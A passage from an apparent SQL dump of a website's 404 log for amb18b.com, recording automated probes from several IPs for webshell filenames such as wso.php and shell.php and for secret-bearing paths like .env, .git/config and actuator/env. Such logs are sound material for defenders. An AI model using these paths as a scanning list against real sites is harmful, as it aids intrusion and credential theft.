16:26:21'),(7217,'https://amb18b.com/gecko-litespeed.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:22','2025-11-16 16:26:22'),(7218,'https://amb18b.com/bolt.php','130.33.24.148','Direct Access',2,'2025-11-16 16:27:00','2025-11-16 16:26:23'),(7219,'https://amb18b.com/NewFile.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:24','2025-11-16 16:26:24'),(7220,'https://amb18b.com/otuz1.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:25','2025-11-16 16:26:25'),(7221,'https://amb18b.com/classwithtostring.php?p=','130.33.24.148','Direct Access',1,'2025-11-16 16:26:27','2025-11-16 16:26:27'),(7222,'https://amb18b.com/info.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:28','2025-11-16 16:26:28'),(7223,'https://amb18b.com/mlex.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:29','2025-11-16 16:26:29'),(7224,'https://amb18b.com/file1.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:30','2025-11-16 16:26:30'),(7225,'https://amb18b.com/11.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:31','2025-11-16 16:26:31'),(7226,'https://amb18b.com/warm.PhP7','130.33.24.148','Direct Access',1,'2025-11-16 16:26:32','2025-11-16 16:26:32'),(7227,'https://amb18b.com/zxl.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:33','2025-11-16 16:26:33'),(7228,'https://amb18b.com/wp-wso.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:35','2025-11-16 16:26:35'),(7229,'https://amb18b.com/uana.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:37','2025-11-16 16:26:37'),(7230,'https://amb18b.com/a.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:38','2025-11-16 16:26:38'),(7231,'https://amb18b.com/ayk.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:39','2025-11-16 16:26:39'),(7232,'https://amb18b.com/gawean.PhP7','130.33.24.148','Direct Access',1,'2025-11-16 16:26:40','2025-11-16 16:26:40'),(7233,'https://amb18b.com/inc.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:41','2025-11-16 16:26:41'),(7234,'https://amb18b.com/api.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:43','2025-11-16 16:26:43'),(7235,'https://amb18b.com/ioxi-rex4.php7','130.33.24.148','Direct Access',1,'2025-11-16 16:26:44','2025-11-16 16:26:44'),(7236,'https://amb18b.com/million.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:45','2025-11-16 16:26:45'),(7237,'https://amb18b.com/include.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:46','2025-11-16 16:26:46'),(7238,'https://amb18b.com/bala.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:48','2025-11-16 16:26:48'),(7239,'https://amb18b.com/category.tokens.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:49','2025-11-16 16:26:49'),(7240,'https://amb18b.com/mari.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:50','2025-11-16 16:26:50'),(7241,'https://amb18b.com/json.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:51','2025-11-16 16:26:51'),(7242,'https://amb18b.com/new.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:53','2025-11-16 16:26:53'),(7243,'https://amb18b.com/woh.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:54','2025-11-16 16:26:54'),(7244,'https://amb18b.com/admin-ajax.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:55','2025-11-16 16:26:55'),(7245,'https://amb18b.com/wp_mna.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:56','2025-11-16 16:26:56'),(7246,'https://amb18b.com/dex.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:58','2025-11-16 16:26:58'),(7247,'https://amb18b.com/file5.php','130.33.24.148','Direct Access',1,'2025-11-16 16:26:59','2025-11-16 16:26:59'),(7248,'https://amb18b.com/flower.php','130.33.24.148','Direct Access',1,'2025-11-16 16:27:01','2025-11-16 16:27:01'),(7249,'https://amb18b.com/graphql','157.245.204.205','Direct Access',1,'2025-11-16 18:25:29','2025-11-16 18:25:29'),(7250,'https://amb18b.com/api','157.245.204.205','Direct Access',1,'2025-11-16 18:25:30','2025-11-16 18:25:30'),(7251,'https://amb18b.com/api/graphql','157.245.204.205','Direct Access',1,'2025-11-16 18:25:31','2025-11-16 18:25:31'),(7252,'https://amb18b.com/graphql/api','157.245.204.205','Direct Access',1,'2025-11-16 18:25:32','2025-11-16 18:25:32'),(7253,'https://amb18b.com/api/gql','157.245.204.205','Direct Access',1,'2025-11-16 18:25:34','2025-11-16 18:25:34'),(7254,'https://amb18b.com/swagger-ui.html','157.245.204.205','Direct Access',1,'2025-11-16 18:25:34','2025-11-16 18:25:34'),(7255,'https://amb18b.com/swagger/index.html','157.245.204.205','Direct Access',1,'2025-11-16 18:25:36','2025-11-16 18:25:36'),(7256,'https://amb18b.com/swagger/swagger-ui.html','157.245.204.205','Direct Access',1,'2025-11-16 18:25:36','2025-11-16 18:25:36'),(7257,'https://amb18b.com/webjars/swagger-ui/index.html','157.245.204.205','Direct Access',1,'2025-11-16 18:25:37','2025-11-16 18:25:37'),(7258,'https://amb18b.com/swagger.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:37','2025-11-16 18:25:37'),(7259,'https://amb18b.com/swagger/v1/swagger.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:38','2025-11-16 18:25:38'),(7260,'https://amb18b.com/v2/api-docs','157.245.204.205','Direct Access',1,'2025-11-16 18:25:38','2025-11-16 18:25:38'),(7261,'https://amb18b.com/v3/api-docs','157.245.204.205','Direct Access',1,'2025-11-16 18:25:39','2025-11-16 18:25:39'),(7262,'https://amb18b.com/api-docs/swagger.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:40','2025-11-16 18:25:40'),(7263,'https://amb18b.com/api/swagger.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:41','2025-11-16 18:25:41'),(7264,'https://amb18b.com/@vite/env','157.245.204.205','Direct Access',1,'2025-11-16 18:25:42','2025-11-16 18:25:42'),(7265,'https://amb18b.com/actuator/env','157.245.204.205','Direct Access',1,'2025-11-16 18:25:43','2025-11-16 18:25:43'),(7266,'https://amb18b.com/server','157.245.204.205','Direct Access',1,'2025-11-16 18:25:43','2025-11-16 18:25:43'),(7267,'https://amb18b.com/.vscode/sftp.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:44','2025-11-16 18:25:44'),(7268,'https://amb18b.com/about','157.245.204.205','Direct Access',1,'2025-11-16 18:25:44','2025-11-16 18:25:44'),(7269,'https://amb18b.com/debug/default/view?panel=config','157.245.204.205','Direct Access',1,'2025-11-16 18:25:45','2025-11-16 18:25:45'),(7270,'https://amb18b.com/v2/_catalog','157.245.204.205','Direct Access',1,'2025-11-16 18:25:45','2025-11-16 18:25:45'),(7271,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','157.245.204.205','Direct Access',1,'2025-11-16 18:25:46','2025-11-16 18:25:46'),(7272,'https://amb18b.com/server-status','157.245.204.205','Direct Access',1,'2025-11-16 18:25:46','2025-11-16 18:25:46'),(7273,'https://amb18b.com/login.action','157.245.204.205','Direct Access',1,'2025-11-16 18:25:48','2025-11-16 18:25:48'),(7274,'https://amb18b.com/_all_dbs','157.245.204.205','Direct Access',1,'2025-11-16 18:25:48','2025-11-16 18:25:48'),(7275,'https://amb18b.com/.DS_Store','157.245.204.205','Direct Access',1,'2025-11-16 18:25:49','2025-11-16 18:25:49'),(7276,'https://amb18b.com/.env','157.245.204.205','Direct Access',1,'2025-11-16 18:25:49','2025-11-16 18:25:49'),(7277,'https://amb18b.com/.git/config','157.245.204.205','Direct Access',1,'2025-11-16 18:25:50','2025-11-16 18:25:50'),(7278,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','157.245.204.205','Direct Access',1,'2025-11-16 18:25:50','2025-11-16 18:25:50'),(7279,'https://amb18b.com/config.json','157.245.204.205','Direct Access',1,'2025-11-16 18:25:51','2025-11-16 18:25:51'),(7280,'https://amb18b.com/telescope/requests','157.245.204.205','Direct Access',1,'2025-11-16 18:25:51','2025-11-16 18:25:51'),(7281,'https://amb18b.com/info.php','157.245.204.205','Direct Access',1,'2025-11-16 18:25:52','2025-11-16 18:25:52'),(7282,'https://amb18b.com/shoha.php','74.176.63.235','Direct Access',1,'2025-11-16 19:11:59','2025-11-16 19:11:59'),(7283,'https://amb18b.com/ze.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:00','2025-11-16 19:12:00'),(7284,'https://amb18b.com/xo.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:02','2025-11-16 19:12:02'),(7285,'https://amb18b.com/wp-the1me.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:03','2025-11-16 19:12:03'),(7286,'https://amb18b.com/m.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:04','2025-11-16 19:12:04'),(7287,'https://amb18b.com/e.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:05','2025-11-16 19:12:05'),(7288,'https://amb18b.com/dd1.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:06','2025-11-16 19:12:06'),(7289,'https://amb18b.com/conn.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:09','2025-11-16 19:12:09'),(7290,'https://amb18b.com/card.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:11','2025-11-16 19:12:11'),(7291,'https://amb18b.com/asas.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:12','2025-11-16 19:12:12'),(7292,'https://amb18b.com/kki.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:13','2025-11-16 19:12:13'),(7293,'https://amb18b.com/js.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:15','2025-11-16 19:12:15'),(7294,'https://amb18b.com/view.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:16','2025-11-16 19:12:16'),(7295,'https://amb18b.com/wso.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:17','2025-11-16 19:12:17'),(7296,'https://amb18b.com/sid3.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:19','2025-11-16 19:12:19'),(7297,'https://amb18b.com/mans.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:20','2025-11-16 19:12:20'),(7298,'https://amb18b.com/111.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:21','2025-11-16 19:12:21'),(7299,'https://amb18b.com/403.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:22','2025-11-16 19:12:22'),(7300,'https://amb18b.com/4yps5d.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:23','2025-11-16 19:12:23'),(7301,'https://amb18b.com/fs6.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:25','2025-11-16 19:12:25'),(7302,'https://amb18b.com/lv.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:26','2025-11-16 19:12:26'),(7303,'https://amb18b.com/habhan.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:27','2025-11-16 19:12:27'),(7304,'https://amb18b.com/akcc.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:29','2025-11-16 19:12:29'),(7305,'https://amb18b.com/bi1f.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:30','2025-11-16 19:12:30'),(7306,'https://amb18b.com/lib.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:31','2025-11-16 19:12:31'),(7307,'https://amb18b.com/luxe.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:33','2025-11-16 19:12:33'),(7308,'https://amb18b.com/wsd.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:34','2025-11-16 19:12:34'),(7309,'https://amb18b.com/404.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:35','2025-11-16 19:12:35'),(7310,'https://amb18b.com/an7.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:36','2025-11-16 19:12:36'),(7311,'https://amb18b.com/fs7.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:37','2025-11-16 19:12:37'),(7312,'https://amb18b.com/new4.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:39','2025-11-16 19:12:39'),(7313,'https://amb18b.com/icon.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:40','2025-11-16 19:12:40'),(7314,'https://amb18b.com/blox.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:41','2025-11-16 19:12:41'),(7315,'https://amb18b.com/gm.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:42','2025-11-16 19:12:42'),(7316,'https://amb18b.com/iko.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:44','2025-11-16 19:12:44'),(7317,'https://amb18b.com/miso.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:45','2025-11-16 19:12:45'),(7318,'https://amb18b.com/moie.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:46','2025-11-16 19:12:46'),(7319,'https://amb18b.com/shelp.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:47','2025-11-16 19:12:47'),(7320,'https://amb18b.com/siln.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:49','2025-11-16 19:12:49'),(7321,'https://amb18b.com/sko.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:50','2025-11-16 19:12:50'),(7322,'https://amb18b.com/3.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:52','2025-11-16 19:12:52'),(7323,'https://amb18b.com/wp-gif.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:53','2025-11-16 19:12:53'),(7324,'https://amb18b.com/wp-good.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:54','2025-11-16 19:12:54'),(7325,'https://amb18b.com/rrr.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:55','2025-11-16 19:12:55'),(7326,'https://amb18b.com/tj.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:56','2025-11-16 19:12:56'),(7327,'https://amb18b.com/vansec.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:57','2025-11-16 19:12:57'),(7328,'https://amb18b.com/filesss.php','74.176.63.235','Direct Access',1,'2025-11-16 19:12:59','2025-11-16 19:12:59'),(7329,'https://amb18b.com/ss.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:00','2025-11-16 19:13:00'),(7330,'https://amb18b.com/wp-is.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:01','2025-11-16 19:13:01'),(7331,'https://amb18b.com/jmfi2.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:02','2025-11-16 19:13:02'),(7332,'https://amb18b.com/scx.php7','74.176.63.235','Direct Access',1,'2025-11-16 19:13:03','2025-11-16 19:13:03'),(7333,'https://amb18b.com/777.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:05','2025-11-16 19:13:05'),(7334,'https://amb18b.com/f35.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:06','2025-11-16 19:13:06'),(7335,'https://amb18b.com/ioxi-o.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:07','2025-11-16 19:13:07'),(7336,'https://amb18b.com/csv.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:08','2025-11-16 19:13:08'),(7337,'https://amb18b.com/shlo.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:09','2025-11-16 19:13:09'),(7338,'https://amb18b.com/abc.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:11','2025-11-16 19:13:11'),(7339,'https://amb18b.com/wpc1.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:12','2025-11-16 19:13:12'),(7340,'https://amb18b.com/ww.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:14','2025-11-16 19:13:14'),(7341,'https://amb18b.com/raw.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:15','2025-11-16 19:13:15'),(7342,'https://amb18b.com/mah.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:16','2025-11-16 19:13:16'),(7343,'https://amb18b.com/p.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:17','2025-11-16 19:13:17'),(7344,'https://amb18b.com/xpas22.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:19','2025-11-16 19:13:19'),(7345,'https://amb18b.com/wp1.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:20','2025-11-16 19:13:20'),(7346,'https://amb18b.com/fm.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:22','2025-11-16 19:13:22'),(7347,'https://amb18b.com/eauu.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:24','2025-11-16 19:13:24'),(7348,'https://amb18b.com/css.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:25','2025-11-16 19:13:25'),(7349,'https://amb18b.com/ru.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:26','2025-11-16 19:13:26'),(7350,'https://amb18b.com/tmpls.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:27','2025-11-16 19:13:27'),(7351,'https://amb18b.com/shell.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:28','2025-11-16 19:13:28'),(7352,'https://amb18b.com/ae.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:29','2025-11-16 19:13:29'),(7353,'https://amb18b.com/smpx.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:30','2025-11-16 19:13:30'),(7354,'https://amb18b.com/wp-asd.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:32','2025-11-16 19:13:32'),(7355,'https://amb18b.com/class5.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:33','2025-11-16 19:13:33'),(7356,'https://amb18b.com/yas.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:34','2025-11-16 19:13:34'),(7357,'https://amb18b.com/yanki.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:35','2025-11-16 19:13:35'),(7358,'https://amb18b.com/g7y.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:36','2025-11-16 19:13:36'),(7359,'https://amb18b.com/ok.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:38','2025-11-16 19:13:38'),(7360,'https://amb18b.com/yasnu.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:39','2025-11-16 19:13:39'),(7361,'https://amb18b.com/moon.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:40','2025-11-16 19:13:40'),(7362,'https://amb18b.com/wio.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:41','2025-11-16 19:13:41'),(7363,'https://amb18b.com/oswkk.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:43','2025-11-16 19:13:43'),(7364,'https://amb18b.com/rex.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:44','2025-11-16 19:13:44'),(7365,'https://amb18b.com/aj.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:45','2025-11-16 19:13:45'),(7366,'https://amb18b.com/snus.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:46','2025-11-16 19:13:46'),(7367,'https://amb18b.com/naxc.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:48','2025-11-16 19:13:48'),(7368,'https://amb18b.com/v3.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:49','2025-11-16 19:13:49'),(7369,'https://amb18b.com/nc4.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:50','2025-11-16 19:13:50'),(7370,'https://amb18b.com/api137.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:51','2025-11-16 19:13:51'),(7371,'https://amb18b.com/class629.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:53','2025-11-16 19:13:53'),(7372,'https://amb18b.com/wp-x7.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:54','2025-11-16 19:13:54'),(7373,'https://amb18b.com/wp670.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:55','2025-11-16 19:13:55'),(7374,'https://amb18b.com/Okxob.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:56','2025-11-16 19:13:56'),(7375,'https://amb18b.com/Sanskrit.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:58','2025-11-16 19:13:58'),(7376,'https://amb18b.com/jq.php','74.176.63.235','Direct Access',1,'2025-11-16 19:13:59','2025-11-16 19:13:59'),(7377,'https://amb18b.com/x7.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:00','2025-11-16 19:14:00'),(7378,'https://amb18b.com/zex.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:01','2025-11-16 19:14:01'),(7379,'https://amb18b.com/zxin.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:03','2025-11-16 19:14:03'),(7380,'https://amb18b.com/asd67.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:04','2025-11-16 19:14:04'),(7381,'https://amb18b.com/st.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:05','2025-11-16 19:14:05'),(7382,'https://amb18b.com/an.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:07','2025-11-16 19:14:07'),(7383,'https://amb18b.com/enkkk.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:08','2025-11-16 19:14:08'),(7384,'https://amb18b.com/ext.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:09','2025-11-16 19:14:09'),(7385,'https://amb18b.com/fe5.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:11','2025-11-16 19:14:11'),(7386,'https://amb18b.com/13.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:12','2025-11-16 19:14:12'),(7387,'https://amb18b.com/wp.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:13','2025-11-16 19:14:13'),(7388,'https://amb18b.com/wp-freya.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:14','2025-11-16 19:14:14'),(7389,'https://amb18b.com/hello.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:16','2025-11-16 19:14:16'),(7390,'https://amb18b.com/ex.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:17','2025-11-16 19:14:17'),(7391,'https://amb18b.com/lock1.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:18','2025-11-16 19:14:18'),(7392,'https://amb18b.com/mini.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:19','2025-11-16 19:14:19'),(7393,'https://amb18b.com/ups.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:20','2025-11-16 19:14:20'),(7394,'https://amb18b.com/bes.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:22','2025-11-16 19:14:22'),(7395,'https://amb18b.com/wp-swa.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:23','2025-11-16 19:14:23'),(7396,'https://amb18b.com/42u.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:24','2025-11-16 19:14:24'),(7397,'https://amb18b.com/lc.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:25','2025-11-16 19:14:25'),(7398,'https://amb18b.com/gmo.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:26','2025-11-16 19:14:26'),(7399,'https://amb18b.com/CLA.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:28','2025-11-16 19:14:28'),(7400,'https://amb18b.com/gfile.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:29','2025-11-16 19:14:29'),(7401,'https://amb18b.com/ahax.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:31','2025-11-16 19:14:31'),(7402,'https://amb18b.com/gold.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:32','2025-11-16 19:14:32'),(7403,'https://amb18b.com/ol.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:33','2025-11-16 19:14:33'),(7404,'https://amb18b.com/wp-gr.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:34','2025-11-16 19:14:34'),(7405,'https://amb18b.com/co.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:35','2025-11-16 19:14:35'),(7406,'https://amb18b.com/aua.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:37','2025-11-16 19:14:37'),(7407,'https://amb18b.com/aa.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:38','2025-11-16 19:14:38'),(7408,'https://amb18b.com/great.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:39','2025-11-16 19:14:39'),(7409,'https://amb18b.com/class9.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:40','2025-11-16 19:14:40'),(7410,'https://amb18b.com/pass.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:41','2025-11-16 19:14:41'),(7411,'https://amb18b.com/lock360.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:42','2025-11-16 19:14:42'),(7412,'https://amb18b.com/ot.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:44','2025-11-16 19:14:44'),(7413,'https://amb18b.com/witmm.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:45','2025-11-16 19:14:45'),(7414,'https://amb18b.com/lo.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:47','2025-11-16 19:14:47'),(7415,'https://amb18b.com/vxrl.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:48','2025-11-16 19:14:48'),(7416,'https://amb18b.com/vxonb.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:49','2025-11-16 19:14:49'),(7417,'https://amb18b.com/wozxsh.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:50','2025-11-16 19:14:50'),(7418,'https://amb18b.com/whf.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:52','2025-11-16 19:14:52'),(7419,'https://amb18b.com/bkxzo.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:53','2025-11-16 19:14:53'),(7420,'https://amb18b.com/okxoby.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:55','2025-11-16 19:14:55'),(7421,'https://amb18b.com/error1.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:56','2025-11-16 19:14:56'),(7422,'https://amb18b.com/xtt.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:57','2025-11-16 19:14:57'),(7423,'https://amb18b.com/autoload_classmap.php','74.176.63.235','Direct Access',1,'2025-11-16 19:14:58','2025-11-16 19:14:58'),(7424,'https://amb18b.com/wcas.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:00','2025-11-16 19:15:00'),(7425,'https://amb18b.com/class-db.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:01','2025-11-16 19:15:01'),(7426,'https://amb18b.com/xxx.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:02','2025-11-16 19:15:02'),(7427,'https://amb18b.com/acp.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:03','2025-11-16 19:15:03'),(7428,'https://amb18b.com/awh77.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:04','2025-11-16 19:15:04'),(7429,'https://amb18b.com/nax.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:06','2025-11-16 19:15:06'),(7430,'https://amb18b.com/wolv2.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:07','2025-11-16 19:15:07'),(7431,'https://amb18b.com/mtvcrew.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:08','2025-11-16 19:15:08'),(7432,'https://amb18b.com/twso.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:09','2025-11-16 19:15:09'),(7433,'https://amb18b.com/144.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:10','2025-11-16 19:15:10'),(7434,'https://amb18b.com/exhitrgp.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:12','2025-11-16 19:15:12'),(7435,'https://amb18b.com/n3.php','74.176.63.235','Direct Access',1,'2025-11-16 19:15:13','2025-11-16 19:15:13'),(7436,'https://amb18b.com/old/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:33','2025-11-16 20:00:33'),(7437,'https://amb18b.com/blog/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:36','2025-11-16 20:00:36'),(7438,'https://amb18b.com/backup/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:37','2025-11-16 20:00:37'),(7439,'https://amb18b.com/wp/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:38','2025-11-16 20:00:38'),(7440,'https://amb18b.com/new/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:39','2025-11-16 20:00:39'),(7441,'https://amb18b.com/wordpress/','35.203.175.44','Direct Access',1,'2025-11-16 20:00:40','2025-11-16 20:00:40'),(7442,'https://amb18b.com/neshe.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:15','2025-11-16 23:22:15'),(7443,'https://amb18b.com/wsd.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:06','2025-11-16 23:22:17'),(7444,'https://amb18b.com/error.php','52.138.205.19','Direct Access',3,'2025-11-16 23:23:08','2025-11-16 23:22:19'),(7445,'https://amb18b.com/file52.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:21','2025-11-16 23:22:21'),(7446,'https://amb18b.com/abcd.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:22','2025-11-16 23:22:22'),(7447,'https://amb18b.com/image.php','52.138.205.19','Direct Access',2,'2025-11-16 23:22:46','2025-11-16 23:22:24'),(7448,'https://amb18b.com/redi.php?p=','52.138.205.19','Direct Access',1,'2025-11-16 23:22:26','2025-11-16 23:22:26'),(7449,'https://amb18b.com/lala.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:27','2025-11-16 23:22:27'),(7450,'https://amb18b.com/222.php','52.138.205.19','Direct 